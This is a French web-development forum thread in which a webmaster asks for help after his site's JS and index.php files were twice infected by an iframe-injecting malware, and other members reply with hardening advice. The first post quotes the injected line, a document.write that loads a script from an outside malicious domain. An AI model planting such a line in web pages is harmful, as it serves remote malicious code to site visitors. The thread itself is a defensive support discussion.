IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

Injection de Malware


Sujet :

Sécurité

  1. #1
    Membre confirmé
    Homme Profil pro
    Webmaster
    Inscrit en
    Janvier 2007
    Messages
    469
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 52
    Localisation : France

    Informations professionnelles :
    Activité : Webmaster
    Secteur : Biens de consommation

    Informations forums :
    Inscription : Janvier 2007
    Messages : 469
    Points : 525
    Points
    525
    Par défaut Injection de Malware
    Bonjour,

    J'ai un de mes sites hébergé en mutualisé.
    Cela fait la deuxième fois que des pages sont infectées par des malawares "mwjs-iframe-injected691?v27"

    Known javascript malware. Details: http://labs.sucuri.net/db/malware/mw...njected691?v27
    document.write('<script type="text/javascript" src="http://mebelpodzakaz.net.ua/gallery/test/3d6zpkfz.php?id=2828159"></script>');
    Les scripts infectés sont les scripts JS et les index.php

    Je ne sais que faire, j'avais modifié mes CHMod de scripts JS en 555, etc... je modifie mes codes FTP.

    Pouvez vous me donner quelques conseils pour éviter que cela se reproduise ?

    Merci à vous.

  2. #2
    Membre expert
    Avatar de Muchos
    Homme Profil pro
    Enseignant
    Inscrit en
    Décembre 2011
    Messages
    1 700
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 38
    Localisation : France, Ardennes (Champagne Ardenne)

    Informations professionnelles :
    Activité : Enseignant
    Secteur : Arts - Culture

    Informations forums :
    Inscription : Décembre 2011
    Messages : 1 700
    Points : 3 849
    Points
    3 849
    Billets dans le blog
    6
    Par défaut
    Bonjour,

    Le piratage d'un site est un sujet malheureusement courant. N'hésitez pas à faire une recherche sur Developpez.

    Faites aussi une recherche en ligne avec le nom du malware. Sucuri signale ainsi que ce malware :
    utilise javascript pour générer dynamiquement une iframe dans le navigateur de votre visiteur. Il est souvent présent sur des sites Joomla et WordPress non mis à jour.
    Plus généralement, il faut se demander d'où vient/viennent la vulnérabilité :

    • de votre PC (infection) ?
    • de votre hébergeur (parlez-en avec lui) ?
    • de votre CMS ou d'un plug-in?
    • d'un fichier intrus ou corrompu dans le répertoire de votre site (vérifiez les logs de votre serveur ou demandez-les à l'hébergeur) ?
    • d'un problème d'intégration (ex: formulaire mal sécurisé) ?


    Dans tous les cas, changer tous vos mots de passe avec si possible des mots de passe plus forts.

    j'avais modifié mes CHMod de scripts JS en 555
    Je suis aussi sur un mutualisé, et il me semble que le CHMOD doit être fixé pour tous les fichiers à 750 (aucun droit pour le groupe Autres).

  3. #3
    Membre confirmé
    Homme Profil pro
    Webmaster
    Inscrit en
    Janvier 2007
    Messages
    469
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 52
    Localisation : France

    Informations professionnelles :
    Activité : Webmaster
    Secteur : Biens de consommation

    Informations forums :
    Inscription : Janvier 2007
    Messages : 469
    Points : 525
    Points
    525
    Par défaut
    Pardon pour ce retard.
    Merci pour ta réponse.

  4. #4
    Membre émérite
    Avatar de cavo789
    Homme Profil pro
    Développeur Web
    Inscrit en
    Mai 2004
    Messages
    1 757
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Belgique

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Mai 2004
    Messages : 1 757
    Points : 2 992
    Points
    2 992
    Par défaut
    Bonsoir

    Il y a un très grand nombre de protections à prendre dont celle (pas l'unique) d'installer un parefeu logiciel. Il vous faut un logiciel qui filtre les URLs qui arrivent sur votre site afin de voir celles qui sont potentiellement dangeureuses afin de les bloquer.

    Le parefeu va aussi bloquer l'exécution de scripts malsains dans des dossiers où de tels scripts n'ont que faire; un exemple : le dossier images.

    Il faut aussi que vos chmods soient, sur un site dynamique, sur 644 pour les fichiers et 755 pour les dossiers.

    Pour info, voici un article que j'ai rédigé en Septembre pour le magazine Joomla. Il s'applique à Joomla mais il reprend un grand nombre de "recettes" applicables partout ailleurs : http://magazine.joomla.org/internati...re-site-joomla (Et si on se penchait sur la sécurité de votre site Joomla!)

    Bonne soirée et bonne protection.
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be

Discussions similaires

  1. injection JavaScript sur server / malware => google site blacklisté
    Par sykaflex dans le forum Général JavaScript
    Réponses: 4
    Dernier message: 02/08/2013, 02h24
  2. Récupération liste de fichier pour qmail-inject
    Par segphault dans le forum Linux
    Réponses: 1
    Dernier message: 07/02/2006, 12h01
  3. Réponses: 20
    Dernier message: 03/02/2006, 10h55
  4. [VB.NET] fonction qui injecte du html dans une zone précise
    Par denisvignes dans le forum ASP.NET
    Réponses: 5
    Dernier message: 27/10/2005, 09h33
  5. Réponses: 10
    Dernier message: 25/10/2005, 16h09

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo